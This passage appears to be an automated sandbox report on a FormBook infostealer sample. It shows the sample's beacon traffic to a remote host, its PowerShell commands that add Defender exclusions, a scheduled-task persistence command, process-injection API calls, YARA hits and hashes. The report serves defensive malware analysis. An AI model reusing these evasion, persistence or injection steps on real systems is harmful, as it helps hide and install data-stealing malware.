                                                                Data Raw: 45 62 66 78 36 3d 67 36 45 6d 44 72 78 4f 55 4c 57 71 71 48 2b 42 64 76 37 35 72 59 67 74 64 73 66 6a 35 4a 41 43 69 43 47 45 64 6b 69 4e 36 58 73 52 4b 61 34 44 35 35 45 4e 58 5a 7a 35 6a 45 64 4a 56 53 4a 61 59 4b 59 65 37 6f 62 6e 77 72 55 70 76 63 33 34 38 6b 37 67 7a 6a 34 2f 64 35 42 65 2b 2b 41 48 45 64 4a 58 69 34 57 65 51 56 45 72 31 4e 64 70 34 73 31 36 69 4b 44 63 31 73 66 74 65 36 4e 6b 56 72 4d 42 71 4e 71 4c 69 69 65 66 49 43 4a 30 56 77 4d 46 6a 62 53 31 39 72 79 6d 38 6a 61 69 6d 54 6d 63 75 2f 49 35 32 68 68 54 30 6c 75 75 47 64 49 6d 66 72 67 48 6b 65 76 47 6f 77 2b 54 76 33 51 4a 69 4d 57 57 39 38 55 6f 57 76 53 43 6f 5a 79 48 66 6a 77 69 36 6d 59 71 4e 49 50 4c 54 50 4b 55 48 76 4e 63 6d 51 54 56 5a 72 7a 4a 2b 45 76 6e 36 68 70 6d 54 4c 6b 56 58 33 4a 4d 66 30 76 59 53 54 6b 63 50 35 35 51 76 6d 66 75 2b 51 54 5a 52 48 48 4c 7a 4b 50 75 6f 4b 33 4b 55 74 4e 41 59 36 64 54 5a 4b 35 51 71 79 34 70 66 49 67 76 71 42 2f 69 67 55 7a 58 57 48 7a 6e 6e 38 50 32 64 57 70 54 66 70 5a 65 [TRUNCATED]
                                                                Data Ascii: Ebfx6=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 [TRUNCATED]
                                                                Dec 9, 2024 08:46:32.175741911 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                Date: Mon, 09 Dec 2024 07:46:31 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                36 | 192.168.2.12 | 49767 | 199.192.23.123 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:46:33.610960007 CET | 533 | OUT | GET /d5up/?Ebfx6=t4sGAbB2VavWqiiIadPUj68mTJ7Q54MapR6mUVHY3SwgNZVHyOwsTaauiAAffAhHdKJKrrjT+NERuNHfq0vx0hlOGpFc29QbO/AvwrqpPk1c7Mdu4vpn2Z4=&Njld=LDTtwxbX2vi0G HTTP/1.1
                                                                Host: www.learnnow.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:46:34.828695059 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                Date: Mon, 09 Dec 2024 07:46:34 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Target ID: 0
                                                                Start time: 02:42:32
                                                                Start date: 09/12/2024
                                                                Path: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe
                                                                Wow64 process (32bit): true
                                                                Commandline: "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe"
                                                                Imagebase: 0x260000
                                                                File size: 842'760 bytes
                                                                MD5 hash: B5554D36A6FCA18D2BBA3D41D4070539
                                                                Has elevated privileges: true
                                                                Has administrator privileges: true
                                                                Programmed in: C, C++ or other language
                                                                Reputation: low
                                                                Has exited: true

                                                                Target ID: 3
                                                                Start time: 02:42:38
                                                                Start date: 09/12/2024
                                                                Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit): true
                                                                Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe"
                                                                Imagebase: 0x550000
                                                                File size: 433'152 bytes
                                                                MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges: true
                                                                Has administrator privileges: true
                                                                Programmed in: C, C++ or other language
                                                                Reputation: high
                                                                Has exited: true

                                                                Target ID: 4
                                                                Start time: 02:42:38
                                                                Start date: 09/12/2024
                                                                Path: C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit): false
                                                                Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase: 0x7ff704000000
                                                                File size: 862'208 bytes
                                                                MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges: true
                                                                Has administrator privileges: true
                                                                Programmed in: C, C++ or other language
                                                                Reputation: high
                                                                Has exited: true

                                                                Target ID: 5
                                                                Start time: 02:42:38
                                                                Start date: 09/12/2024
                                                                Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit): true
                                                                Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe"
                                                                Imagebase: 0x550000
                                                                File size: 433'152 bytes
                                                                MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges: true
                                                                Has administrator privileges: true
                                                                Programmed in: C, C++ or other language
                                                                Reputation: high
                                                                Has exited: true

                                                                Target ID: 6
                                                                Start time: 02:42:38
                                                                Start date: 09/12/2024
                                                                Path: C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit): false
                                                                Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase: 0x7ff704000000
                                                                File size: 862'208 bytes
                                                                MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges: true
                                                                Has administrator privileges: true
                                                                Programmed in: C, C++ or other language
                                                                Reputation: high
                                                                Has exited: true

                                                                Target ID: 7
                                                                Start time: 02:42:38
                                                                Start date: 09/12/2024
                                                                Path: C:\Windows\SysWOW64\schtasks.exe
                                                                Wow64 process (32bit): true
                                                                Commandline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp"
                                                                Imagebase: 0x1a0000
                                                                File size: 187'904 bytes
                                                                MD5 hash: 48C2FE20575769DE916F48EF0676A965
                                                                Has elevated privileges: true
                                                                Has administrator privileges: true
                                                                Programmed in: C, C++ or other language
                                                                Reputation: high
                                                                Has exited: true

                                                                Target ID: 8
                                                                Start time: 02:42:38
                                                                Start date: 09/12/2024
                                                                Path: C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit): false
                                                                Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase: 0x7ff704000000
                                                                File size: 862'208 bytes
                                                                MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges: true
                                                                Has administrator privileges: true
                                                                Programmed in: C, C++ or other language
                                                                Reputation: high
                                                                Has exited: true

                                                                Target ID: 9
                                                                Start time: 02:42:39
                                                                Start date: 09/12/2024
                                                                Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                Wow64 process (32bit): false
                                                                Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                Imagebase: 0x300000
                                                                File size: 45'984 bytes
                                                                MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
                                                                Has elevated privileges: true
                                                                Has administrator privileges: true
                                                                Programmed in: C, C++ or other language
                                                                Reputation: high
                                                                Has exited: true

                                                                Target ID:10
                                                                Start time:02:42:39
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                Imagebase:0xbc0000
                                                                File size:45'984 bytes
                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2621801367.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2624347397.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:02:42:42
                                                                Start date:09/12/2024
                                                                Path:C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe
                                                                Imagebase:0xcd0000
                                                                File size:842'760 bytes
                                                                MD5 hash:B5554D36A6FCA18D2BBA3D41D4070539
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 63%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:02:42:42
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                Imagebase:0x7ff7b93d0000
                                                                File size:496'640 bytes
                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                Has elevated privileges:true
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:15
                                                                Start time:02:42:52
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp"
                                                                Imagebase:0x1a0000
                                                                File size:187'904 bytes
                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:02:42:52
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff704000000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:17
                                                                Start time:02:42:52
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                Imagebase:0xee0000
                                                                File size:45'984 bytes
                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:18
                                                                Start time:02:42:55
                                                                Start date:09/12/2024
                                                                Path:C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe"
                                                                Imagebase:0xdf0000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4781302763.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                Has exited:false

                                                                Target ID:19
                                                                Start time:02:42:56
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\SysWOW64\systray.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\systray.exe"
                                                                Imagebase:0xc10000
                                                                File size:9'728 bytes
                                                                MD5 hash:28D565BB24D30E5E3DE8AFF6900AF098
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4781597517.0000000004690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4781361365.0000000004640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Has exited:false

                                                                Target ID:20
                                                                Start time:02:43:10
                                                                Start date:09/12/2024
                                                                Path:C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe"
                                                                Imagebase:0xdf0000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:23
                                                                Start time:02:43:22
                                                                Start date:09/12/2024
                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                Imagebase:0x7ff6b1600000
                                                                File size:676'768 bytes
                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true


                                                                  Execution Graph

                                                                  Execution Coverage:11.7%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:5.6%
                                                                  Total number of Nodes:161
                                                                  Total number of Limit Nodes:9
                                                                  execution_graph (rendered graph; raw node list omitted). API nodes reached in the graph: PostMessageW (0x9441380, 0x944137a), KiUserCallbackDispatcher (0x94f0c6), CreateProcessA (0x966ca50, 0x966cad9), VirtualAllocEx (0x966c748), WriteProcessMemory (0x966c810), ReadProcessMemory (0x966c903), Wow64SetThreadContext (0x966c23d), ResumeThread (0x966c188), CreateIconFromResourceEx (0x7c8948a, 0x7c89490).

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph (rendered graph; basic-block list omitted). Function spans 0x949ce0-0x94a200 in the 0x940000 dump; one call, to 0x949b6c, at 0x949d5e.
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: XC
                                                                  • API String ID: 0-3125431876
                                                                  • Opcode ID: 2892d8253ecf79d3062eb32e96dea83f2b62cd96284d8e02579025dfaf76c07a
                                                                  • Instruction ID: 87b868254b73dfc31f7483fb792928e858f219241dd7c2b6670a3bbf9c66358b
                                                                  • Opcode Fuzzy Hash: 2892d8253ecf79d3062eb32e96dea83f2b62cd96284d8e02579025dfaf76c07a
                                                                  • Instruction Fuzzy Hash: 5CE1E574E05218CFDB54CFA9D984A9EBBB2FF89300F1084AAD50AEB364DB345942CF15

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph (rendered graph; basic-block list omitted). Function spans 0x949cf0-0x94a200 in the 0x940000 dump; one call, to 0x949b6c, within 0x949d17-0x949d64.
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: XC
                                                                  • API String ID: 0-3125431876
                                                                  • Opcode ID: f6196b6cd0b5ee51d0680235bbb6abc9630f3f4d33cbbe01d0d55bb0b3de25af
                                                                  • Instruction ID: e137779614cc9425c3de42d266ed3f9ffdc913d70265519681a62cfa47db5340
                                                                  • Opcode Fuzzy Hash: f6196b6cd0b5ee51d0680235bbb6abc9630f3f4d33cbbe01d0d55bb0b3de25af
                                                                  • Instruction Fuzzy Hash: 7CE1E474E05218CFDB54CFA9D984A9EBBB2FF89300F10846AD50AEB364DB349942CF11
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: a7E
                                                                  • API String ID: 0-4110136650
                                                                  • Opcode ID: b79e0096bb1b7fc31b7d95c32ee1a0741d8b9cbf067e225866f65a529f169a10
                                                                  • Instruction ID: 5c97c092222dd5ab333f13f8cd176e77a0ca631c8e29fc8937f25fa27bc8cdb5
                                                                  • Opcode Fuzzy Hash: b79e0096bb1b7fc31b7d95c32ee1a0741d8b9cbf067e225866f65a529f169a10
                                                                  • Instruction Fuzzy Hash: A5610974E0860A8FDB48CFA5C4409AEFBF2EF89300F24946AD419A7265D7385A81CF94
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 825f06058c22f21ec6615eaec26b78edff44e27b2cea431d5cedfbb513cb1bb5
                                                                  • Instruction ID: 0a084b57771b6726fe4a868b1dd0fb239c3e4d589818598c9e7b49ad07fceeb0
                                                                  • Opcode Fuzzy Hash: 825f06058c22f21ec6615eaec26b78edff44e27b2cea431d5cedfbb513cb1bb5
                                                                  • Instruction Fuzzy Hash: 2D427EB0A10219CFDB54EFA9C89079EBBF2BF88304F14856AD009AB395DB349D45CF91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437631109.0000000009440000.00000040.00000800.00020000.00000000.sdmp, Offset: 09440000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_9440000_MN1qo2qaJmEvXDP.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437631109.0000000009440000.00000040.00000800.00020000.00000000.sdmp, Offset: 09440000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_9440000_MN1qo2qaJmEvXDP.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437631109.0000000009440000.00000040.00000800.00020000.00000000.sdmp, Offset: 09440000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_9440000_MN1qo2qaJmEvXDP.jbxd

                                                                  Control-flow Graph

                                                                  • Control-flow graph of the function at 966ca44 (last block 966cd95); the basic block 966cbdf-966cc99 calls CreateProcessA
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0966CC86
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • API String ID: 963392458-0

                                                                  Control-flow Graph

                                                                  • Control-flow graph of the function at 966ca50 (last block 966cd95); the basic block 966cbdf-966cc99 calls CreateProcessA
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0966CC86
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • API String ID: 963392458-0

                                                                  Control-flow Graph

                                                                  • Control-flow graph of the function at 7c89440 (last block 7c89532); calls the internal routine at 7c8836c, and the basic block 7c89490-7c8950c calls CreateIconFromResourceEx
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFromIconResource
                                                                  • API String ID: 3668623891-0

                                                                  Control-flow Graph

                                                                  • Control-flow graph of the function at 966c7c1 (last block 966c89e); the basic block 966c826-966c865 calls WriteProcessMemory
                                                                  APIs
                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0966C858
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • API String ID: 3559483778-0

                                                                  Control-flow Graph

                                                                  • Control-flow graph of the function at 966c7c8 (last block 966c89e); the basic block 966c826-966c865 calls WriteProcessMemory
                                                                  APIs
                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0966C858
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
